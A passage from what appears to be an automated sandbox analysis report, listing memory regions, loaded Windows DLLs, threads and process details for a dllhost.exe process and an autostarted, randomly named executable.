= 7922 start_va = 0x1d80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 7923 start_va = 0x2030000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 7924 start_va = 0x2130000 end_va = 0x23fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7925 start_va = 0x2410000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 7926 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 7927 start_va = 0x2790000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 7928 start_va = 0x29e0000 end_va = 0x2a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 7929 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7930 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7931 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7932 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7933 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7934 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7935 start_va = 0xff610000 end_va = 0xff616fff monitored = 0 entry_point = 0xff61124c region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 7936 start_va = 0x7fef8c40000 end_va = 0x7fef8d2dfff monitored = 0 entry_point = 0x7fef8c412a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 7937 start_va = 0x7fefbf80000 end_va = 0x7fefbfd5fff monitored = 0 entry_point = 0x7fefbf8bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7938 start_va = 0x7fefcc20000 end_va = 0x7fefcc66fff monitored = 0 entry_point = 0x7fefcc21064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7939 start_va = 0x7fefcf20000 end_va = 0x7fefcf37fff monitored = 0 entry_point = 0x7fefcf23b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7940 start_va = 0x7fefd520000 end_va = 0x7fefd52efff monitored = 0 entry_point = 0x7fefd521010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7941 start_va = 0x7fefd610000 end_va = 0x7fefd623fff monitored = 0 entry_point = 0x7fefd6110e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 7942 start_va = 0x7fefd7e0000 end_va = 0x7fefd84bfff monitored = 0 entry_point = 0x7fefd7e2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7943 start_va = 0x7fefda00000 end_va = 0x7fefdb2cfff monitored = 0 entry_point = 0x7fefda4ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7944 start_va = 0x7fefdb30000 end_va = 0x7fefdbf8fff monitored = 0 entry_point = 0x7fefdbaa874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7945 start_va = 0x7fefdc00000 end_va = 0x7fefdc0dfff monitored = 0 entry_point = 0x7fefdc01080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7946 start_va = 0x7fefdc20000 end_va = 0x7fefdc90fff monitored = 0 entry_point = 0x7fefdc31e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7947 start_va = 0x7fefdca0000 end_va = 0x7fefdd06fff monitored = 0 entry_point = 0x7fefdcab03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7948 start_va = 0x7fefdd60000 end_va = 0x7fefdd7efff monitored = 0 entry_point = 0x7fefdd660e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7949 start_va = 0x7fefdd80000 end_va = 0x7fefdf82fff monitored = 0 entry_point = 0x7fefdda3330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7950 start_va = 0x7fefdff0000 end_va = 0x7fefe01dfff monitored = 0 entry_point = 0x7fefdff1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7951 start_va = 0x7fefe020000 end_va = 0x7fefe0fafff monitored = 0 entry_point = 0x7fefe040760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7952 start_va = 0x7fefe4e0000 end_va = 0x7fefe5e8fff monitored = 0 entry_point = 0x7fefe4e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7953 start_va = 0x7fefe850000 end_va = 0x7fefe8e8fff monitored = 0 entry_point = 0x7fefe851c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 7954 start_va = 0x7fefe8f0000 end_va = 0x7fefe9c6fff monitored = 0 entry_point = 0x7fefe8f3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7955 start_va = 0x7fefea70000 end_va = 0x7feff7f7fff monitored = 0 entry_point = 0x7fefeaecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7956 start_va = 0x7feff930000 end_va = 0x7feff9cefff monitored = 0 entry_point = 0x7feff9325a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7957 start_va = 0x7feffa00000 end_va = 0x7feffa00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7958 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7959 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 7960 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 7961 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 7962 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 7963 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 7964 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 7965 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7970 start_va = 0x70000 end_va = 0x71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 7971 start_va = 0x7fefc160000 end_va = 0x7fefc353fff monitored = 0 entry_point = 0x7fefc2ec924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 7972 start_va = 0x80000 end_va = 0x80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 7973 start_va = 0x200000 end_va = 0x201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 7976 start_va = 0x7fefbfe0000 end_va = 0x7fefc10bfff monitored = 0 entry_point = 0x7fefbfe94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7977 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 7980 start_va = 0x210000 end_va = 0x213fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 7981 start_va = 0x220000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 7982 start_va = 0x250000 end_va = 0x253fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 7983 start_va = 0x480000 end_va = 0x4e5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 7986 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 7987 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 7988 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 7989 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 7990 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 7991 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 7992 start_va = 0x7fefb6b0000 end_va = 0x7fefb6dcfff monitored = 0 entry_point = 0x7fefb6b1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 7993 start_va = 0x7fefdf90000 end_va = 0x7fefdfe1fff monitored = 0 entry_point = 0x7fefdf910d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 7994 start_va = 0x260000 end_va = 0x263fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 7995 start_va = 0x4f0000 end_va = 0x506fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 7996 start_va = 0x270000 end_va = 0x270fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 7997 start_va = 0x1e80000 end_va = 0x1edbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 8000 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8001 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8002 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8003 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8004 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8005 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8006 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8007 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8008 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8009 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8012 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8013 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8014 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8015 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8016 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8019 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8020 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8021 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8022 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8023 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8030 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8031 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8032 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8033 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8034 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8039 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8040 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8041 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8042 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8043 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8044 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8045 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8046 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8047 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8048 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8051 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8052 start_va = 0x2b80000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 8053 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 8054 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8055 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8056 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 8057 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Thread: id = 54 os_tid = 0xa84 Thread: id = 55 os_tid = 0xa88 Thread: id = 56 os_tid = 0xa8c Thread: id = 57 os_tid = 0xa90 Thread: id = 58 os_tid = 0xa94 Thread: id = 59 os_tid = 0xa98 Thread: id = 60 os_tid = 0xa9c Thread: id = 61 os_tid = 0xa80 Process: id = "7" image_name = "winzvg4hxq8.exe" filename = "c:\\program files (x86)\\cmrkpgp\\winzvg4hxq8.exe" page_root = "0x7a674000" os_pid = "0x530" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed78" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9733 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9734 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9735 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9736 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 9737 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9738 start_va = 0x340000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 9739 start_va = 0xc30000 end_va = 0xc7dfff monitored = 1 entry_point = 0xc695ce region_type = mapped_file name = "winzvg4hxq8.exe" filename = "\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe" (normalized: "c:\\program files (x86)\\cmrkpgp\\winzvg4hxq8.exe") Region: id = 9740 start_va = 0x77630000 end_va = 0x777d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9741 start_va = 0x77810000 end_va = 0x7798ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9742 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 9743 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 9744 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 9745 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 9746 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9747 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9748 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9872 start_va = 0x590000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 9873 start_va = 0x73f30000 end_va = 0x73f37fff monitored = 0 entry_point = 0x73f320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9874 start_va = 0x73f40000 end_va = 0x73f9bfff monitored = 0 entry_point = 0x73f7f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9875 start_va = 0x73fa0000 end_va = 0x73fdefff monitored = 0 entry_point = 0x73fce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9876 start_va = 0x77510000 end_va = 0x7762efff monitored = 0 entry_point = 0x77525340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9877 start_va = 0x754f0000 end_va = 0x755fffff monitored = 0 entry_point = 0x75503283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9878 start_va = 0x77510000 end_va = 0x7762efff monitored = 0 entry_point = 0x77525340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9879 start_va = 0x77510000 end_va = 0x7762efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077510000" filename = "" Region: id = 9880 start_va = 0x77410000 end_va = 0x77509fff monitored = 0 entry_point = 0x7742a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9881 start_va = 0x77410000 end_va = 0x77509fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077410000" filename = "" Region: id = 9882 start_va = 0x610000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9883 start_va = 0x73ee0000 end_va = 0x73f29fff monitored = 1 entry_point = 0x73ee2e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 9884 start_va = 0x754f0000 end_va = 0x755fffff monitored = 0 entry_point = 0x75503283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9885 start_va = 0x76ab0000 end_va = 0x76af6fff monitored = 0 entry_point = 0x76ab74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9886 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9887 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9888 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" 